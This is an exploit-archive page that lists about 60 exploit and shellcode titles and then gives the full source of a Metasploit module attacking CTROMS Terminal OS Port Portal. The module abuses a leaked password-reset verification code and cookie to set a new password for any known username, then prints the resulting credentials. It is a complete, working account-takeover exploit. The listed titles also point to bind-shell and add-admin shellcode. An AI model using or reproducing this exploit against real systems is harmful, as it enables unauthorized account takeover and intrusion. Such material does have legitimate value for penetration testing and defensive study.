
51 changes to exploits/shellcodes Tor Browser < 0.3.2.10 - Use After Free (PoC) Notepad++ < 7.7 (x64) - Denial of Service SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service InputMapper 1.6.10 - Denial of Service SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) XnConvert 1.82 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC) SpotDialup 1.6.7 - 'Key' Denial of Service (PoC) Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC) FreeBSD 12.0 - 'fd' Local Privilege Escalation iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH) DeviceViewer 3.12.0.1 - Arbitrary Password Change Winrar 5.80 - XML External Entity Injection Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution Siemens TIA Portal - Remote Command Execution Android 7 < 9 - Remote Code Execution CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit) CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit) CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit) MyBB < 1.8.21 - Remote Code Execution Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery Publisure Hybrid - Multiple Vulnerabilities NetGain EM Plus 10.1.68 - Remote Command Execution Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion DotNetNuke 9.3.2 - Cross-Site Scripting VehicleWorkshop 1.0 - 'bookingid' SQL Injection WordPress Plugin Tutor.1.5.3 - Local File Inclusion WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting WordPress Plugin Wordfence.7.4.5 - Local File Disclosure WordPress Plugin contact-form-7 5.1.6 - Remote File Upload WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting Joomla! 3.9.0 < 3.9.7 - CSV Injection PlaySMS 1.4.3 - Template Injection / Remote Code Execution Wing FTP Server - Authenticated CSRF (Delete Admin) WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification UADMIN Botnet 1.0 - 'link' SQL Injection Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload Wordpress Plugin PicUploader 1.0 - Remote File Upload PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution WordPress Plugin Helpful 2.4.11 - SQL Injection Prestashop 1.7.6.4 - Cross-Site Request Forgery WordPress Plugin Simple File List 5.4 - Remote Code Execution Library CMS Powerful Book Management System 2.2.0 - Session Fixation Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection Beauty Parlour Management System 1.0 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes) Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)
131 lines
No EOL
5.1 KiB
Text
131 lines
No EOL
5.1 KiB
Text
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Auxiliary
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'CTROMS Terminal OS - Port Portal "Password Reset" Authentication Bypass' ,
|
|
'Description' => %q{
|
|
This module exploits an authentication bypass in CTROMS, triggered by password reset verification code disclosure.
|
|
In order to exploit this vulnerability, the username must be known.
|
|
Exploiting this vulnerability create a new password for the user you specified and present it to you.
|
|
|
|
The "verification code" and "cookie generate" functions required to reset the password contain vulnerability.
|
|
When the "userId" parameter is posted to "getverificationcode.jsp", a verification code is transmitted to the account's phone number for password reset.
|
|
But this verification code written in the database is also reflected in the response of the request.
|
|
The first vector would be to use this verification code.
|
|
The second vector is the "rand" cookie values returned in this request. These values are md5.
|
|
If these values are assigned in the response, password reset can be done via these cookie values.
|
|
Ex: [ Cookie: 6fb36ecf2a04b8550ba95603047fe85=fae0bKBGtKBKtKh.wKA.vLBmuLxmuM.; 34d1c350632806406ecc517050da0=b741baa96686a91d4461145e40a9c2df ]
|
|
},
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '' ],
|
|
[ 'URL', 'https://www.pentest.com.tr/exploits/CTROMS-Terminal-OS-Port-Portal-Password-Reset-Authentication-Bypass.html' ],
|
|
[ 'URL', 'https://www.globalservices.bt.com' ]
|
|
],
|
|
'Author' =>
|
|
[
|
|
'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'DisclosureDate' => "March 2 2020",
|
|
'DefaultOptions' => { 'SSL' => true }
|
|
))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(443),
|
|
OptString.new('USERNAME', [true, 'Username']),
|
|
OptString.new('PASSWORD', [true, 'Password for the reset', Rex::Text.rand_text_alphanumeric(12)])
|
|
])
|
|
end
|
|
|
|
def peer
|
|
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
|
|
end
|
|
|
|
def check
|
|
begin
|
|
res = send_request_cgi({
|
|
'method' => 'POST',
|
|
'ctype' => 'application/x-www-form-urlencoded',
|
|
'uri' => normalize_uri(target_uri.path, 'getverificationcode.jsp'),
|
|
'headers' =>
|
|
{
|
|
'Referer' => "#{peer}/verification.jsp"
|
|
},
|
|
'data' => "userId=#{Rex::Text.rand_text_alphanumeric(8)}"
|
|
})
|
|
rescue
|
|
return Exploit::CheckCode::Unknown
|
|
end
|
|
|
|
if res.code == 200 and res.body.include? '"rand"'
|
|
return Exploit::CheckCode::Appears
|
|
end
|
|
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
|
|
def run
|
|
unless Exploit::CheckCode::Appears == check
|
|
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
|
|
end
|
|
res = send_request_cgi({
|
|
'method' => 'POST',
|
|
'ctype' => 'application/x-www-form-urlencoded',
|
|
'uri' => normalize_uri(target_uri.path, 'getuserinfo.jsp'),
|
|
'headers' =>
|
|
{
|
|
'Referer' => "#{peer}/verification.jsp"
|
|
},
|
|
'data' => "userId=#{datastore["USERNAME"]}"
|
|
})
|
|
|
|
if res.code == 200 and res.body.include? '"mobileMask"'
|
|
print_good("Excellent! password resettable for #{datastore["USERNAME"]}")
|
|
else
|
|
fail_with(Failure::NotVulnerable, 'The user you specified is not valid')
|
|
end
|
|
|
|
begin
|
|
|
|
res = send_request_cgi({
|
|
'method' => 'POST',
|
|
'ctype' => 'application/x-www-form-urlencoded',
|
|
'uri' => normalize_uri(target_uri.path, 'getverificationcode.jsp'),
|
|
'headers' =>
|
|
{
|
|
'Referer' => "#{peer}/verification.jsp"
|
|
},
|
|
'data' => "userId=#{datastore["USERNAME"]}"
|
|
})
|
|
|
|
@cookie = res.get_cookies
|
|
|
|
res = send_request_cgi({
|
|
'method' => 'POST',
|
|
'ctype' => 'application/x-www-form-urlencoded',
|
|
'uri' => normalize_uri(target_uri.path, 'getresult.jsp'),
|
|
'cookie' => @cookie,
|
|
'headers' =>
|
|
{
|
|
'Referer' => "#{peer}/verification.jsp"
|
|
},
|
|
'data' => "userId=#{datastore["USERNAME"]}&password=#{datastore["PASSWORD"]}"
|
|
})
|
|
if res.body.include? 'result":10'
|
|
print_good("boom! Password successfully reseted.")
|
|
print_good("Username : #{datastore["USERNAME"]}")
|
|
print_good("Password : #{datastore["PASSWORD"]}")
|
|
else
|
|
fail_with(Failure::BadConfig, "Unknown error while resetting the password. Response: #{res.code}")
|
|
end
|
|
end
|
|
end
|
|
end |